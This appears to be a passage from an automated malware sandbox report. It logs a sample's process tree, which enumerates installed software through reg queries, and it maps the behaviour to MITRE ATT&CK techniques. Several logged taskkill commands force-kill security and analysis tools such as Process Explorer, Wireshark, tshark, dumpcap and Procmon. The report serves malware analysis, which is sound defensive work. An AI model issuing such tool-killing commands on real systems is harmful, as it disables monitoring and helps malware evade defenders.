- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0011-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1804
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1964
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1892
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0015-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:592
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1560
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0016-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1792
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1520
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0018-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1076
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1636
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1388
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0019-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1800
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2044
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001A-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1088
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1720
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1940
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001B-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1524
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:284
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ConfigSecurityPolicy.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1556
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1168
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-040C-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:592
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:780
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1968
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-001F-0C0A-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1480
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1936
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-002C-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:612
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1476
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0000-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1992
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1524
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1840
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0043-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1976
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2004
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1064
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0044-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1988
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1496
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-006E-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1296
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1956
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1804
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00A1-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1480
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1800
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-00BA-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:1492
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1960
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0115-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:892
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90140000-0117-0409-1000-0000000FF1CE}" /reg:32
    3⤵
    PID:592
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" /reg:32
    3⤵
    PID:1556
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}" /reg:32
    3⤵
    PID:612
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1836
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" /reg:32
    3⤵
    PID:1680
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1032
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}" /reg:32
    3⤵
    PID:592
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:64
    3⤵
    PID:1076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Adobe AIR" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1088
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:64
    3⤵
    PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Google Chrome" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:892
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1680
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:64
    3⤵
    PID:760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1972
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1924
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:64
    3⤵
    PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757" /reg:32
    3⤵
    PID:1388
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:64
    3⤵
    PID:592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173" /reg:32
    3⤵
    PID:1840
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:64
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860" /reg:32
    3⤵
    PID:1928
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1556
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:64
    3⤵
    PID:1076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655" /reg:32
    3⤵
    PID:1840
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1988
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:64
    3⤵
    PID:612
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743" /reg:32
    3⤵
    PID:1992
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1076
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:64
    3⤵
    PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063" /reg:32
    3⤵
    PID:844
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:64
    3⤵
    PID:760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573" /reg:32
    3⤵
    PID:612
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1924
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:64
    3⤵
    PID:760
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{92FB6C44-E685-45AD-9B20-CADF4CABA132}.KB4087364" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1928
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:844
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:64
    3⤵
    PID:1928
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{AC76BA86-7AD7-1033-7B44-A90000000001}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2056
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2068
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:64
    3⤵
    PID:2080
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}" /reg:32
    3⤵
    PID:2092
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:64
    3⤵
    PID:2116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2128
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:64
    3⤵
    PID:2152
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2164
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:2176
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:64
    3⤵
    PID:2188
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2200
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "wireshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2212
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "tshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2260
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "text2pcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2308
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "rawshark.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2364
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "dumpcap.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2412
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "capinfos.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2460
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Procmon.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2508

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads